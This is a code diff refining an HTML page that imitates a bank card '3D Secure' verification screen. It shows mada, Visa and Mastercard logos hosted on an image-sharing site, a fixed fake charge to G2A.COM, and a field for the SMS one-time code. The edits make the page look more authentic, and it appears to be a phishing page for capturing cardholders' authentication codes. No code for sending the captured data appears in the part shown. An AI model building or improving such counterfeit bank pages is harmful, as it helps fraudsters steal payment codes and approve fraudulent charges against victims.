--- a/index.html
+++ b/index.html
@@ -3,168 +3,170 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>3D Secure Verification</title>
+    <title>Verification Page</title>
     <style>
         body {
-            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
+            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Arial, sans-serif;
             background-color: #ffffff;
             margin: 0;
-            padding: 20px;
+            padding: 15px;
             color: #000;
-            display: flex;
-            justify-content: center;
         }
 
         .container {
-            width: 100%;
-            max-width: 400px;
+            max-width: 450px;
+            margin: 0 auto;
         }
 
-        /* الجزء العلوي - كلمة Cancel */
-        .cancel-link {
-            text-align: right;
-            font-size: 14px;
-            font-weight: 600;
+        /* الجزء العلوي: سهم الرجوع وكلمة Cancel */
+        .top-bar {
+            display: flex;
+            justify-content: space-between;
+            align-items: center;
             margin-bottom: 20px;
+        }
+
+        .back-arrow {
+            color: #0000FF;
+            font-size: 26px;
+            font-weight: bold;
+            cursor: pointer;
+            text-decoration: none;
+        }
+
+        .cancel-text {
+            font-weight: bold;
+            font-size: 15px;
             cursor: pointer;
         }
 
-        /* منطقة الشعارات */
-        .header-logos {
+        /* الشعارات بمقاسات واضحة */
+        .logos-row {
             display: flex;
             justify-content: space-between;
-            align-items: flex-end;
-            margin-bottom: 8px;
+            align-items: center;
+            margin-bottom: 5px;
         }
 
         .mada-logo img {
-            height: 22px; /* مقاس صغير متناسق */
+            height: 38px; /* مقاس محسّن للوضوح */
             width: auto;
+            display: block;
         }
 
-        .card-logos-wrapper {
+        .provider-logos {
             text-align: right;
         }
 
-        .card-logos-wrapper img {
-            height: 18px; /* مقاس صغير للفيزا والماستر كارد */
+        .provider-logos img {
+            height: 32px; /* مقاس محسّن للفيزا والماستركارد */
             width: auto;
             display: block;
             margin-left: auto;
         }
 
-        .id-check-text {
+        .id-check-label {
             font-size: 11px;
-            color: #444;
+            color: #666;
             margin-top: 2px;
         }
 
         hr {
             border: 0;
-            border-top: 1px solid #d1d1d1;
+            border-top: 1px solid #eeeeee;
             margin: 10px 0 25px 0;
         }
 
-        /* النصوص الأساسية */
+        /* النصوص */
         h1 {
             font-family: "Times New Roman", Times, serif;
-            font-size: 22px;
-            font-weight: bold;
-            margin: 0 0 20px 0;
+            font-size: 24px;
+            margin-bottom: 25px;
         }
 
         p {
-            font-size: 15px;
-            line-height: 1.4;
-            margin-bottom: 18px;
+            font-size: 16px;
+            line-height: 1.5;
+            margin-bottom: 20px;
         }
 
-        .transaction-details {
-            font-weight: normal;
-        }
-
-        /* حقل الإدخال والزر */
-        .form-section {
+        /* منطقة الإدخال */
+        .form-area {
             text-align: center;
-            margin-top: 45px;
+            margin-top: 40px;
         }
 
         .input-label {
-            display: block;
+            color: #888;
             font-size: 14px;
-            color: #757575;
-            margin-bottom: 8px;
+            margin-bottom: 10px;
+            display: block;
         }
 
         input[type="text"] {
             width: 100%;
-            max-width: 300px;
-            height: 40px;
-            border: 1px solid #bcbcbc;
-            border-radius: 2px;
-            font-size: 18px;
+            max-width: 320px;
+            height: 48px;
+            border: 1px solid #d1d1d1;
+            border-radius: 4px;
+            font-size: 20px;
             text-align: center;
             margin-bottom: 25px;
             outline: none;
         }
 
-        .confirm-btn {
+        .btn-confirm {
             width: 100%;
-            background-color: #0000FF; /* اللون الأزرق الصريح */
+            background-color: #0000FF;
             color: white;
             border: none;
-            padding: 14px;
+            padding: 15px;
             font-size: 16px;
             font-weight: bold;
-            border-radius: 2px;
+            border-radius: 4px;
             cursor: pointer;
             text-transform: uppercase;
         }
 
-        .resend-code {
+        .resend-link {
             display: block;
-            margin-top: 40px;
+            margin: 35px 0 50px 0;
             color: #0000FF;
             text-decoration: none;
             font-weight: bold;
             font-size: 14px;
-            margin-bottom: 50px;
         }
 
         /* الروابط السفلية */
-        .footer-nav {
-            border-top: 1px solid #f0f0f0;
-            padding-top: 10px;
+        .footer-links {
+            border-top: 1px solid #f8f8f8;
         }
 
         .footer-item {
             display: flex;
             justify-content: space-between;
-            align-items: center;
+            padding: 15px 0;
             color: #00008B;
             text-decoration: none;
-            font-size: 14px;
-            padding: 12px 0;
-        }
-
-        .plus-icon {
-            font-size: 18px;
-            font-weight: 300;
+            font-size: 15px;
         }
     </style>
 </head>
 <body>
 
 <div class="container">
-    <div class="cancel-link">Cancel</div>
+    <div class="top-bar">
+        <div class="back-arrow">&#10094;</div>
+        <div class="cancel-text">Cancel</div>
+    </div>
 
-    <div class="header-logos">
+    <div class="logos-row">
         <div class="mada-logo">
             <img src="https://i.ibb.co/fG2CKyhR/E01-BB971-3-E72-498-A-BEAA-004-A9098-EC7-A.png" alt="mada">
         </div>
-        <div class="card-logos-wrapper">
-            <img src="https://i.ibb.co/sv5VB9wQ/88347052-D6-A4-4974-A56-C-FCAD68185365.png" alt="Visa Mastercard">
-            <div class="id-check-text">ID Check</div>
+        <div class="provider-logos">
+            <img src="https://i.ibb.co/sv5VB9wQ/88347052-D6-A4-4974-A56-C-FCAD68185365.png" alt="Card Logos">
+            <div class="id-check-label">ID Check</div>
         </div>
     </div>
 
@@ -174,24 +176,18 @@
 
     <p>We have sent you a text message with a code to your registered mobile number.</p>
     
-    <p class="transaction-details">
-        You are paying G2A.COM the amount of EUR 1.46 on 2026/02/15 01:54:11.
-    </p>
+    <p>You are paying <strong>G2A.COM</strong> the amount of <strong>EUR 1.46</strong> on 2026/02/15 01:54:11.</p>
 
-    <div class="form-section">
+    <div class="form-area">
         <label class="input-label">Verification code</label>
-        <input type="text" id="otp">
-        <button class="confirm-btn">Confirm</button>
-        <a href="#" class="resend-code">RESEND CODE</a>
+        <input type="text" placeholder="">
+        <button class="btn-confirm">CONFIRM</button>
+        <a href="#" class="resend-link">RESEND CODE</a>
     </div>
 
-    <div class="footer-nav">
-        <a href="#" class="footer-item">
-            Learn more about authentication <span class="plus-icon">+</span>
-        </a>
-        <a href="#" class="footer-item">
-            Need some help ? <span class="plus-icon">+</span>
-        </a>
+    <div class="footer-links">
+        <a href="#" class="footer-item">Learn more about authentication <span>+</span></a>
+        <a href="#" class="footer-item">Need some help ? <span>+</span></a>
     </div>
 </div>
 
